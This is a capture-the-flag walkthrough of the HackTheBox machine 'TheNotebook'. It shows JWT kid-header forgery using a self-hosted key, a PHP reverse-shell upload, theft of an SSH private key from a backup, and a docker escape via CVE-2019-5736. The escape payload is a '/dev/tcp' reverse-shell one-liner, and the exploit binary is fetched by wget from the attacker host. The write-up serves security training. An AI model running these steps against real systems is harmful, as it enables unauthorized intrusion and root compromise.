We’ll look at another one of HackTheBox machines today, called “TheNotebook.” It is a medium difficulty box targeting commonly found threat of using insecure JWT token implementation. A user is able to gain access to the system by forging this token and adding desired values. We’d own the root user by targeting it. Here is the methodology.
Penetration Testing Methodology
Recon
·
Nmap
·
JWT cookie analysis
Exploitation
·
Forging the JWT token with admin rights and self-generated private key
·
Uploading a PHP backdoor
·
Recovering SSH private key from an old backup directory
·
Enumerating sudoers
·
Exploiting vulnerable version of docker (CVE-2019-5736)
·
Gaining root access
Recon
Machine’s
IP was 10.129.211.197. The first step was to run nmap’s aggressive scan to look
for open ports. As you can see a port 80 was found to be open.
nmap
-A 10.129.211.197
The
website opens up a note management tool. There was a register link too.
After
registering, we observed that a Base64 encoded token was being transferred on
our request of signing up. It would be interesting to see what data was getting
transferred.
We
decoded the Base64 and got to know it was a JWT token.
We have often
extracted critical information out of JWT token misconfigurations. We used
jwt.io for the purpose. As you can see that the header picks a “Key ID” or
“kid” from a remote location. This is a private key which is used as an authentication method by clients to
authenticate to the authorization server when using the token endpoint. Also,
there is an “admin_cap” variable that shows if admin access is provided to the
user or not.
Exploitation
So,
we’ll generate a private key, host it on our local server, and change the JWT
header to my own key’s location and try if the website fetches and
authenticates using our key.
openssl
genrsa -out privKey.key 2048
python
-m SimpleHTTPServer 80
We’d
change the fields in our JWT header now and paste our own key in the field
below for the token to verify the signature and successfully authenticate using
my key.
Look
how we’ve changed the location of key, admin_cap is set to true and pasted the
key below. Note the color coding to comprehend how the JWT token is made.
Now,
after being logged in using the username and password we used to sign up, this
newly generated token should be replaced in the auth cookie and site reloaded.
After doing this, we see admin panel now visible on the nav bar.
The
admin panel has an upload file option.
So
we uploaded a php-reverse-shell from the /usr/share/webshells/php directory in
Kali and changed the location with our local IP.
To
make things easy, site provided us with a link to view the uploaded file too.
Privilege Escalation
Before
opening this file up, we fired a netcat listener. Then after clicking on view
can get a reverse shell. We convert this into a proper teletype first.
python3
-c 'import pty;pty.spawn("/bin/bash")'
In
the var/backups directory we saw home.tar.gz which was an old account
backup.
We
copy this into the temp directory and unzip it. We observed that the user is
“noah” and has a dump of his home directory.
cp
home.tar.gz /tmp/
tar
cvzf home.tar.gz
Smart
thing to do here is do dumpster diving for old SSH keys. Luckily, we did find
the SSH keys and copied this private key to our system.
cat
/home/noah/.ssh/id_rsa
We
changed the permission on the key to “600” and logged in to noah’s account
using it.
nano
sshkey
chmod
600 sshkey
ssh
-i sshkey noah@10.129.211.197
The
user flag was in /home.
We
immediately check the sudoers list because it’s the most direct way of modelling
privilege escalation approach.
We
found that noah was allowed to run “docker exec” command as root.
We
enumerated docker’s version first.
sudo
-l
docker
version
We
observed that version 18.06.0-ce was affected by CVE-2019-5736, a docker escape
vulnerability. The POC of the same can be found here. This exploit would let us
overwrite and execute the host systems binary from within the container.
So,
what we did was copy the exploit, modify it, upload it and execute it.
git
clone https://github.com/Frichetten/CVE-2019-5736-PoC
cd
CVE-2019-5736
nano
main.go
Here,
we’ll modify the variable “payload” with this bash one liner
bash
-i >& /dev/tcp/10.10.14.100/9999 0>&1
And
then we save this
We
need to compile this script into an executable and then launch our local server
to upload it to the machine.
go
build main.go
python
-m SimpleHTTPServer 80
In
the machine, we first jumped into the container using docker exec command.
sudo
/usr/bin/docker exec -it webapp-dev01 /bin/bash
After
that we’ll copy the exploit in /tmp and execute it
cd
/tmp
wget
10.10.14.100/main
chmod
777 main
./main
Now,
we’ll open another window and log in using noah separately and execute the
command docker exec command but the catch is that this time the binary “sh” has
been overwritten by our exploit and it would run the “payload” that we defined
in our exploit.
Also
make sure to fire up a netcat listener on port 9999.
sudo
/usr/bin/docker exec -it webapp-dev01 sh
We
fired up the window in which netcat was running and observe a shell had been
prompted. This is the root of thenotebook!
nc
-lvp 9999
cd
/root
cat
root.txt
We
snagged the flag in /root directory
Conclusion
Hence,
this is how we were able to own the system access in the CTF TheNotebook.
Please let us know in the comments how you found our approach and query any
clarifications for any steps that you may need. Thanks for the read.
0 comments:
Post a Comment